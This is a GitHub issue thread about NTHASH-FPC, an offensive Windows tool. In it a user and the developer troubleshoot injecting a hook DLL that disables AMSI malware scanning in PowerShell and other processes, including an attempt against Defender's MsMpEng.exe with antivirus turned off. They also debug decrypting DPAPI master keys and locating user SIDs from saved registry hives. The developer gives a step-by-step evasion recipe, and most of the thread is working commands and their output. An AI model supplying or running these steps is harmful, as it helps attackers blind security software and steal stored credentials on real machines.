erwan2212 / NTHASH-FPC


/inject and amsi disable behaviour #10

Closed Papotito123 closed 4 years ago

Papotito123 commented 4 years ago

Hello: Win 10 1809 x64. Avast free ON.

I am testing the amsi feature.

From cmd it does not run well. So then I run it from powershell.

I think the hook.dll is stuck. I think this aswhook.dll is for the Avast antivirus.

```
PS C:\Windows\system32> cd "C:\NTJASH\amsi"
PS C:\NTJASH\amsi> NTHASH-win64.exe /enumproc | findstr powershell.exe
1016 powershell.exe DESKTOP-2GHHNFK\TESTACCOUNT
PS C:\NTJASH\amsi> NTHASH-win64.exe /enummod /pid:1016 | findstr hook
7FF8CFFF0000 aswhook.dll
PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:1016 /binary:hook-win64.dll
NTHASH 1.8 x64 by erwan2212@gmail.com
module not found
PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:7FF8CFFF0000 /binary:hook-win64.dll
NTHASH 1.8 x64 by erwan2212@gmail.com
An unhandled exception occurred at $0000000100031A45: EConvertError: "7FF8CFFF0000" is an invalid integer
$0000000100031A45
$00000001000089C8
$000000010000C306
$000000010001E010
$00000001000020F0
$00007FF8D6D67974
$00007FF8D76DA271
```

So I have to turn OFF my Avast and then run the commands. Then it runs well: it will inject and eject the right hook-win64.dll.

So I turn OFF Avast and inject the amsi hook. Then I try /decodemk and a lot of EAccessViolation errors arise:

```
C:\NTJASH>NTHASH-win64.exe /decodemk /binary:C:\jibes\PROBANDO\bb0fd3d0-3daa-4d06-aa93-a282eea027db /input:B46D14DBEBD3F288804BBA5F494F98C810DB4675
NTHASH 1.8 x64 by erwan2212@gmail.com
Unprotecting MasterKey
An unhandled exception occurred at $0000000100063C61: EAccessViolation:
An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation:
An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation:
An unhandled exception occurred at $00007FF8D397C2E0: EAccessViolation:
[the previous line repeats identically many more times]
```

```
C:\NTJASH>NTHASH-win64.exe /decodemk /binary:C:\jibes\PROBANDO\bb0fd3d0-3daa-4d06-aa93-a282eea027db /password:EAD1AC3807B2D4DCB14962D71DADE9B8E756A437
NTHASH 1.8 x64 by erwan2212@gmail.com
cannot detect SID
Unprotecting MasterKey
An unhandled exception occurred at $0000000100063C66: EAccessViolation: Access violation
$0000000100063C66
$00000001000658AC
$000000010000B09D
$000000010000C306
$000000010001E010
$00000001000020F0
$00007FF8D6D67974
$00007FF8D76DA271
```

Any info much appreciated.

erwan2212 commented 4 years ago

About the below:

```
PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:1016 /binary:hook-win64.dll
NTHASH 1.8 x64 by erwan2212@gmail.com
module not found
PS C:\NTJASH\amsi> NTHASH-win64.exe /eject /pid:7FF8CFFF0000 /binary:hook-win64.dll
```

You need to inject your module first, then eject it. 7FF8CFFF0000 is not a valid PID: in your case it should be 1016.

I have adapted the code so that it won't crash if you provide an invalid PID.

Also, you can now use the full path both when using inject and eject: more convenient on the command line. Example:

```
NTHASH-win64.exe /inject /pid:5436 /binary:C:\test\MsvpPasswordValidate\hook-win64.dll
NTHASH-win64.exe /eject /pid:5436 /binary:C:\test\MsvpPasswordValidate\hook-win64.dll
```

I will look at the other details you provided.

erwan2212 commented 4 years ago

About "how to find usernames and their SID's offline"

```
reg save hklm\software software.sav
```

then

```
offlinereg-win64.exe software.sav "Microsoft\Windows NT\CurrentVersion\ProfileList" enumkeys
```

then

```
offlinereg-win64.exe software.sav "Microsoft\Windows NT\CurrentVersion\ProfileList\my_sid" enumvaluesall
```

As indeed, you either know the SID and SHA1 password and compute the input you will provide to decodemk (/input), or your MK file is stored in a folder with the SID in the folder path, and you can then provide only the SHA1 password (/password).
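One way to do the same ProfileList lookup from a saved SOFTWARE hive with built-in Windows tooling instead of offlinereg, as an added example that is not part of NTHASH-FPC; the hive path and the mount name are constructed placeholders, and it must run from an elevated prompt because `reg load` needs administrator rights:

```powershell
# Added example (not NTHASH-FPC or offlinereg code): list user profile SIDs and
# usernames from a SOFTWARE hive captured with "reg save hklm\software software.sav".
param(
    [string]$HivePath  = "C:\case\software.sav",   # constructed placeholder path
    [string]$MountName = "OfflineSoftware"          # hypothetical mount key name
)

$mount = "HKLM\$MountName"
& reg.exe load $mount $HivePath | Out-Null
if ($LASTEXITCODE -ne 0) { throw "reg load failed for $HivePath" }

try {
    $profileList = "HKLM:\$MountName\Microsoft\Windows NT\CurrentVersion\ProfileList"
    Get-ChildItem -Path $profileList |
        # Only real user profiles carry a domain/machine SID (S-1-5-21-...);
        # the S-1-5-18/19/20 service account entries are skipped.
        Where-Object { $_.PSChildName -like 'S-1-5-21-*' } |
        ForEach-Object {
            $sid  = $_.PSChildName
            $path = (Get-ItemProperty -Path $_.PSPath).ProfileImagePath
            # Resolving the SID only works if the account exists on the examining
            # machine; for a hive from another host fall back to the folder name.
            try {
                $acct = New-Object System.Security.Principal.SecurityIdentifier($sid)
                $name = $acct.Translate([System.Security.Principal.NTAccount]).Value
            } catch {
                $name = Split-Path -Path $path -Leaf
            }
            [pscustomobject]@{ SID = $sid; ProfileImagePath = $path; User = $name }
        } | Format-Table -AutoSize
}
finally {
    # Drop handles to the mounted hive before unloading, otherwise unload fails.
    [GC]::Collect()
    & reg.exe unload $mount | Out-Null
}
```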

erwan2212 commented 4 years ago

And to be clear about AMSI: this is per process. Some processes like powershell will use AMSI; therefore you can:

- launch powershell
- inject the amsi hook to disable amsi
- do your stuff
- eject your amsi hook, or simply close powershell

Papotito123 commented 4 years ago

Hello: Thanks for responding.

I had never used the offlinereg-win64.exe switch before. Cool. I'll try it later.

I made some info text about each user account, just to get results fast. Then I worried about how to get the pertinent info. So I have mkeys, sha1, SID, AES keys, guids and others in a text.

After writing the issue post, I managed to use the AMSI hook. I tested the inject/eject switches and they run well. Always running from powershell, because in cmd it doesn't do anything.

But I am still getting the EAccessViolation error, most of the time when running /decodemk. The strange thing is that it doesn't happen every time. I can run /decodemk and get the key. But on another day I do exactly the same with the same info (I have all results in a txt) and get the EAccessViolation. That's what I'm trying to say.

Papotito123 commented 4 years ago

Hello: I tested the offlinereg-win64.exe switch. Cool.

About AMSI. I was confused. I thought it was like some AMSI.ps1 on the internet that disables the AMSI feature.

So I have to identify and choose my process to be "amsi-bypassed", take note of the pid of the chosen process, and then inject.

So the process can be MsMpEng.exe or any AV executable.

Thanks again.

Papotito123 commented 4 years ago

Hello: I did some tests with AMSI in Win 10 2004H1 x64.

WIN 10 2004H1 with Defender AUG2020 updated ON.

Good when running cmd.exe:

```
D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /enumproc | findstr cmd.exe
6476 cmd.exe DESKTOP-RA99DA6\TESTACCOUNT

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /inject /pid:6476 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll
NTHASH 1.8 x64 by erwan2212@gmail.com
inject ok

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /eject /pid:6476 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll
NTHASH 1.8 x64 by erwan2212@gmail.com
eject ok
```

Error when running MsMpEng.exe (Defender):

```
D:\>cd "NTHASH-FPC-master_Chrome80-logins"

D:\NTHASH-FPC-master_Chrome80-logins>cd "D:\NTHASH-FPC-master_Chrome80-logins"

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /enumproc | findstr MsMpEng.exe
2916 MsMpEng.exe

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /inject /pid:2916 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll
NTHASH 1.8 x64 by erwan2212@gmail.com
An unhandled exception occurred at $00000001000618A7: Exception: NtAllocateVirtualMemory failed,C0000008
$00000001000618A7
$00000001000084B0
$000000010000BF26
$000000010001DA33
$000000010001E381
$00007FFF682A6FD4
$00007FFF68E9CEC1
```

Error when running NTHASH-win64.exe:

```
D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /enumproc | findstr NTHASH-win64.exe
4008 NTHASH-win64.exe DESKTOP-RA99DA6\TESTACCOUNT

D:\NTHASH-FPC-master_Chrome80-logins>NTHASH-win64.exe /inject /pid:4000 /binary:D:\NTHASH-FPC-master_Chrome80-logins\amsi\hook-win64.dll
NTHASH 1.8 x64 by erwan2212@gmail.com
An unhandled exception occurred at $00000001000618A7: Exception: NtAllocateVirtualMemory failed,C0000008
$00000001000618A7
$00000001000084B0
$000000010000BF26
$000000010001DA33
$000000010001E381
$00007FFAC7BF6FD4
$00007FFAC90DCEC1
```

Just to inform.

erwan2212 commented 4 years ago

About inject and "Exception: NtAllocateVirtualMemory failed,C0000008": this is now handled (i.e. it will no longer crash).

Remember thus that injecting the amsi hook is only useful for processes using amsi (vbscript, cscript, powershell, etc ...).

erwan2212 commented 4 years ago

About /decodemk and EAccessViolation: yes, I need to spend time on that one.

I will keep this thread thus about injecting amsi hook if ok with you.

Papotito123 commented 4 years ago

Hello: About AMSI. It will bypass for Windows processes like powershell, cmd, others. Not for third-party exe. Ok.

Much thanks as always.

erwan2212 commented 4 years ago

/inject with the amsi hook now works fine (against processes using amsi like powershell, etc). Fixed a few bugs/crashes in the injection module.